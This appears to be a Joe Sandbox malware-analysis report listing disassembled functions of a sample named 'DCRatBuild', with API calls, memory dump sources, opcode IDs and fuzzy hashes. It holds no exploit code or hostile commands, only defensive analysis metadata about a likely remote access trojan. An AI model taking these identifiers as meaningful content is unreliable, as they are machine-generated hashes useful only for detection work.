                      • Instruction ID: fb5affb736b094afc0e764d52aebb80430226f79c784799533120b474e5418fb
                      • Opcode Fuzzy Hash: 40d72540f604258fd5f14e548e4e8d0b53063de3f31c4a9615ee891cb6375390
                      • Instruction Fuzzy Hash: 1CF0E23164531CBBCF016F68DC06CAE7F61EF08720B008166FC196A260DA728E20FBB1
                      Function 00D8A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Alloc
                      • String ID: FlsAlloc
                      • API String ID: 2773662609-671089009
                      • Opcode ID: a4ac7f654a46f667d4d886164f8554f223f0ea55f38885b9b48e2aa4f2b1997e
                      • Instruction ID: cd75ad416ae9b36668252b269a8ddc1395b80164c5a0ea9486cc38c82e02e7a7
                      • Opcode Fuzzy Hash: a4ac7f654a46f667d4d886164f8554f223f0ea55f38885b9b48e2aa4f2b1997e
                      • Instruction Fuzzy Hash: EBE05530B453287F9B11BB689C028AEBB60CB15B10B410297FC08A7350DE704E0093FA
                      Function 00D8329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • try_get_function.LIBVCRUNTIME ref: 00D832AF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: try_get_function
                      • String ID: FlsAlloc
                      • API String ID: 2742660187-671089009
                      • Opcode ID: c5fd7a5e2a1196436eb616f5e1c77c3e647e8123e6dd38b051c86641ca1595ee
                      • Instruction ID: 4b57b82537357f625dc38da5393c918a9f422d09aa7eea72e07c94c038c15566
                      • Opcode Fuzzy Hash: c5fd7a5e2a1196436eb616f5e1c77c3e647e8123e6dd38b051c86641ca1595ee
                      • Instruction Fuzzy Hash: 5ED02B227807347E9A1232C47C03AAEBE04C701FB5F4501F2FF0C6A246D571450003F9
                      Function 00D8B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D8AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D8B1A5,?), ref: 00D8AF46
                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D8B1EA,?,00000000), ref: 00D8B3C4
                      • GetCPInfo.KERNEL32(00000000,00D8B1EA,?,?,?,00D8B1EA,?,00000000), ref: 00D8B3D7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CodeInfoPageValid
                      • String ID:
                      • API String ID: 546120528-0
                      • Opcode ID: e24d80be71718ba909983bff11aa1db101ae5cc5a1d473eb3e037ee7b4b3293e
                      • Instruction ID: 93df9ef9859eb180947479eaa9d62d7768974ca1359edae9341dde9e4f003674
                      • Opcode Fuzzy Hash: e24d80be71718ba909983bff11aa1db101ae5cc5a1d473eb3e037ee7b4b3293e
                      • Instruction Fuzzy Hash: CE5136B09002059EEB24EF79C8826BABBE5EF45328F1C846FD0968B253D735D545CBB1
                      Function 00D61385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D61385
                        • Part of subcall function 00D66057: __EH_prolog.LIBCMT ref: 00D6605C
                        • Part of subcall function 00D6C827: __EH_prolog.LIBCMT ref: 00D6C82C
                        • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C86F
                        • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C893
                      • new.LIBCMT ref: 00D613FE
                        • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: 0938c942e6ae1e8669b2f1a5741e59e5a188c3202f29247648b702e9c226c32a
                      • Instruction ID: c1342899961c7bd4e09fab39fc49d5f2f82406f3728b05d696ae779e5fd3b030
                      • Opcode Fuzzy Hash: 0938c942e6ae1e8669b2f1a5741e59e5a188c3202f29247648b702e9c226c32a
                      • Instruction Fuzzy Hash: D84134B0805B409EE724DF7984869E7FBE5FF18300F444A2ED2EE83282DB326554CB21
                      Function 00D61380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D61385
                        • Part of subcall function 00D66057: __EH_prolog.LIBCMT ref: 00D6605C
                        • Part of subcall function 00D6C827: __EH_prolog.LIBCMT ref: 00D6C82C
                        • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C86F
                        • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C893
                      • new.LIBCMT ref: 00D613FE
                        • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog
                      • String ID:
                      • API String ID: 3519838083-0
                      • Opcode ID: 1dce9ed280fb9474d371e2895a5337f61da178d14b4856dbbbaac61f3ce02f56
                      • Instruction ID: 75f108c865cd7f4d94f761f4a1c1ce60d352bbe0988bc7326e6b218776dc0a91
                      • Opcode Fuzzy Hash: 1dce9ed280fb9474d371e2895a5337f61da178d14b4856dbbbaac61f3ce02f56
                      • Instruction Fuzzy Hash: 8E4134B0805B409EE724DF798486AE7FBE5FF19300F544A6ED1EE83282DB326554CB25
                      Function 00D8B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D88FA5: GetLastError.KERNEL32(?,00DA0EE8,00D83E14,00DA0EE8,?,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D88FA9
                        • Part of subcall function 00D88FA5: _free.LIBCMT ref: 00D88FDC
                        • Part of subcall function 00D88FA5: SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D8901D
                        • Part of subcall function 00D88FA5: _abort.LIBCMT ref: 00D89023
                        • Part of subcall function 00D8B2AE: _abort.LIBCMT ref: 00D8B2E0
                        • Part of subcall function 00D8B2AE: _free.LIBCMT ref: 00D8B314
                        • Part of subcall function 00D8AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D8B1A5,?), ref: 00D8AF46
                      • _free.LIBCMT ref: 00D8B200
                      • _free.LIBCMT ref: 00D8B236
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorLast_abort
                      • String ID:
                      • API String ID: 2991157371-0
                      • Opcode ID: f88380b0a2278422ea71e419e1c3447cd91add3d8595cab02d536a85c9eedcfe
                      • Instruction ID: eb8274baf031fef27c6ea218b843fee55ba156b157420d33ab2c11a805517829
                      • Opcode Fuzzy Hash: f88380b0a2278422ea71e419e1c3447cd91add3d8595cab02d536a85c9eedcfe
                      • Instruction Fuzzy Hash: CD31C231904208AFDB10FFA9D845BADBBE5EF45330F29409AE4149B3A1EB719D41DB70
                      Function 00D6971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D69EDC,?,?,00D67867), ref: 00D697A6
                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D69EDC,?,?,00D67867), ref: 00D697DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 15505968fc2ac70250500fb92a0a9845dae0502077b372f1761a2f4ee78234bf
                      • Instruction ID: c270149ab848a54d8d635c528b46efbaf9091fcb1645db139741c83847fa418b
                      • Opcode Fuzzy Hash: 15505968fc2ac70250500fb92a0a9845dae0502077b372f1761a2f4ee78234bf
                      • Instruction Fuzzy Hash: EE21F3B1110748AFE7308F64C885BA7B7ECEB49764F04492EF5E582192C375AC899B71
                      Function 00D69D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                      Download Yara Rule
                      APIs
                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D67547,?,?,?,?), ref: 00D69D7C
                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D69E2C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$BuffersFlushTime
                      • String ID:
                      • API String ID: 1392018926-0
                      • Opcode ID: e161e35e8d2bf6d93b91ced8f97489188667b1ad4a9cfb58d9fffb234068e9c0
                      • Instruction ID: 3bb9e2e7ade0f14867d27571be5b7673ffc563d9aa0a7102dfc483fefd7b65d9
                      • Opcode Fuzzy Hash: e161e35e8d2bf6d93b91ced8f97489188667b1ad4a9cfb58d9fffb234068e9c0
                      • Instruction Fuzzy Hash: EE21D671148246ABC714DE24C461AABFBE8AF55708F08482DB4C5C7181D339DA0DDFB1
                      Function 00D8A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(00000000,00D93958), ref: 00D8A4B8
                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D8A4C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AddressProc__crt_fast_encode_pointer
                      • String ID:
                      • API String ID: 2279764990-0
                      • Opcode ID: d3ca4ccd3c34b08c7941666e76328eadc20001e774d2f902b1489746b10ab565
                      • Instruction ID: cb861ded359b7653f6b03ce41c908e46e18cae87c30c237ac8b20b37d0e41faa
                      • Opcode Fuzzy Hash: d3ca4ccd3c34b08c7941666e76328eadc20001e774d2f902b1489746b10ab565
                      • Instruction Fuzzy Hash: 16110633A112219BBF22EE2CEC4486A7395DB8472471A4622FD1DEB354EA70DC41C7F2
                      Function 00D69B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                      Download Yara Rule
                      APIs
                      • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00D69B35,?,?,00000000,?,?,00D68D9C,?), ref: 00D69BC0
                      • GetLastError.KERNEL32 ref: 00D69BCD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorFileLastPointer
                      • String ID:
                      • API String ID: 2976181284-0
                      • Opcode ID: 9f1153c40e844e64aaeae1bdeaf305c18b03ec3f3231efa12ae5d442fe0dd33b
                      • Instruction ID: b2eff64be839b60c3f0f038caaaa75d8d875fe00dc3dd744862a468299e6c4ac
                      • Opcode Fuzzy Hash: 9f1153c40e844e64aaeae1bdeaf305c18b03ec3f3231efa12ae5d442fe0dd33b
                      • Instruction Fuzzy Hash: AF01A1312043159B8B08CE6DBCE496AF39DEFC5721B18452EF956C7290CA31D8099A31
                      Function 00D69E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00D69E76
                      • GetLastError.KERNEL32 ref: 00D69E82
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorFileLastPointer
                      • String ID:
                      • API String ID: 2976181284-0
                      • Opcode ID: 8794214d0844c5aa383f157b3123ddbbb31f6130425678646ff194985d320dd3
                      • Instruction ID: 2f8d867131816f4b4d745745d29f0885b47e2fb23e874891f98336ee128f46ab
                      • Opcode Fuzzy Hash: 8794214d0844c5aa383f157b3123ddbbb31f6130425678646ff194985d320dd3
                      • Instruction Fuzzy Hash: 7B019EB53063005BEB34DE29DC54B6BF6DD9B88314F18493EB146C3681DA32EC488630
                      Function 00D88606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00D88627
                        • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00DA0F50,00D6CE57,?,?,?,?,?,?), ref: 00D88663
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Heap$AllocAllocate_free
                      • String ID:
                      • API String ID: 2447670028-0
                      • Opcode ID: 1c50d0ecde9365842b8fbde332a8b216ff609a0c4d2ea2dff328e1c009916b11
                      • Instruction ID: a436cb418d46f05ecc8aa74eeff30a2961660f4dabece6684e5a46ac9a5a49e1
                      • Opcode Fuzzy Hash: 1c50d0ecde9365842b8fbde332a8b216ff609a0c4d2ea2dff328e1c009916b11
                      • Instruction Fuzzy Hash: E6F0CD32241216AACB213A25AC02F6F6768DF92BB0FA84116F85496191FF20CC00B7B4
                      Function 00D70908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(?,?), ref: 00D70915
                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D7091C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Process$AffinityCurrentMask
                      • String ID:
                      • API String ID: 1231390398-0
                      • Opcode ID: 64fee3f3cd886bddb936187a83ed9189cce87e5aeab8261afbb1ae1deb8ccb09
                      • Instruction ID: 04229e7b5a45befb91ebb03e1995bb101e82ff558d12347eb181dc7698499d77
                      • Opcode Fuzzy Hash: 64fee3f3cd886bddb936187a83ed9189cce87e5aeab8261afbb1ae1deb8ccb09
                      • Instruction Fuzzy Hash: ECE09B36A10105EB6F05CAA49C044BB7B9DDB0421071C817ABA0ED3241F770DD018E70
                      Function 00D6A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                      Download Yara Rule
                      APIs
                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A458
                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A489
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 821d3f81cac55657c2cee26158d135caa0f3f73f3972ace0cb4929145ca368b0
                      • Instruction ID: 247ea3949b77df5b370d6aa09adceb134a1299b54f591ef051532c0f9b4a1946
                      • Opcode Fuzzy Hash: 821d3f81cac55657c2cee26158d135caa0f3f73f3972ace0cb4929145ca368b0
                      • Instruction Fuzzy Hash: DEF01C312402097BDF115EA5DC45BD9776CAB04385F488052BC8CD6261DB769EA8AA71
                      Function 00D7D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemText_swprintf
                      • String ID:
                      • API String ID: 3011073432-0
                      • Opcode ID: 0cad09f5fcbd4fcfcdbf8c024e3cfe8ce461d8c516383b7080408f6ca923cba5
                      • Instruction ID: e4883802f8a9a213ce3f1ebe408be7d723302a6458b0106332828f6b917e5ec8
                      • Opcode Fuzzy Hash: 0cad09f5fcbd4fcfcdbf8c024e3cfe8ce461d8c516383b7080408f6ca923cba5
                      • Instruction Fuzzy Hash: 61F05C319003483BDB11AB709C02FAD371EDB09745F040581B604971A1E9716E204771
                      Function 00D6A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                      Download Yara Rule
                      APIs
                      • DeleteFileW.KERNELBASE(?,?,?,00D6984C,?,?,00D69688,?,?,?,?,00D91FA1,000000FF), ref: 00D6A13E
                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00D6984C,?,?,00D69688,?,?,?,?,00D91FA1,000000FF), ref: 00D6A16C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
